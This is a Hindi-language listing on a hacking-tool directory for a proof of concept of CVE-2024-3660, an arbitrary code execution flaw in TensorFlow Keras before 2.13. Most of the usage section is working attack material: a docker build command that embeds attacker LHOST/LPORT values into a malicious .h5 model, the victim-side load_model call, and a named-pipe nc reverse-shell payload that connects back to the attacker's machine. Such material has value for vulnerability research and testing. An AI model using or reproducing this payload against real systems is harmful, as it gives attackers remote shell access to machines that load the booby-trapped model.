Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-3660-PoC — CVE-2024-3660 के लिए एक PoC। Keras में मनमाना कोड निष्पादन। | Kitploit
उपकरण/GitHubGitHub/aaryanbhujang/cve-2024-3660-poc
भेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंटAI सुरक्षाबाइनरी शोषण
GitHubaaryanbhujang/cve-2024-3660-poc

CVE-2024-3660-PoC

CVE-2024-3660 के लिए एक PoC। Keras में मनमाना कोड निष्पादन।

रिपॉजिटरी देखें
4151 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-3660 – TensorFlow Keras दुर्भावनापूर्ण मॉडल के माध्यम से मनमाना कोड निष्पादन

अवलोकन

CVE-2024-3660 TensorFlow के Keras फ्रेमवर्क में एक मनमाना कोड निष्पादन भेद्यता है जो संस्करण < 2.13 को प्रभावित करती है।
यह एक हमलावर को मॉडल के अंदर Python कोड एम्बेड करने की अनुमति देता है (जैसे, Lambda परत के माध्यम से) जो मॉडल लोड होने पर स्वचालित रूप से निष्पादित होता है।

जब किसी कमजोर वातावरण में एक दुर्भावनापूर्ण .h5 मॉडल फ़ाइल लोड की जाती है, तो लोडिंग प्रक्रिया के समान अनुमतियों के साथ मनमाना कमांड निष्पादित होते हैं।


प्रभावित संस्करण

  • TensorFlow का Keras < 2.13.0
  • Keras मॉडल इसके माध्यम से लोड किए गए:
    root@kitploit:~
    tf.keras.models.load_model("CVE20243660.h5", compile=False)
    

या पुराने TensorFlow संस्करणों में जहां safe_mode डिफ़ॉल्ट रूप से सक्षम नहीं है।

PoC विवरण

यह PoC एक दुर्भावनापूर्ण hack.h5 मॉडल उत्पन्न करने के लिए Docker-आधारित बिल्ड का उपयोग करता है जिसमें एक रिवर्स शेल पेलोड होता है। जब मॉडल किसी कमजोर TensorFlow संस्करण में लोड किया जाता है, तो यह हमलावर की मशीन पर वापस जुड़ जाता है।

उपयोग

1. दुर्भावनापूर्ण मॉडल बनाएं और निकालें

root@kitploit:~
docker buildx build \
  --platform linux/amd64 \
  --build-arg LHOST=<YOUR-IP> \
  --build-arg LPORT=<YOUR-PORT> \
  -t tfimg . && \
container_id=$(docker create tfimg) && \
docker cp $container_id:/CVE20243660/CVE20243660.h5 ./CVE20243660.h5 && \
docker rm $container_id

2. दुर्भावनापूर्ण मॉडल लोड करें (पीड़ित पक्ष)

  • एक कमजोर TensorFlow वातावरण पर (< 2.13):
root@kitploit:~
import tensorflow as tf
model = tf.keras.models.load_model("CVE20243660.h5", compile=False)

पेलोड

  • एम्बेडेड पेलोड रिवर्स शेल के लिए nc का उपयोग करता है:
root@kitploit:~
rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc LHOST LPORT >/tmp/f

संदर्भ

NVD CMU Oligo Security

टूल डाउनलोड करें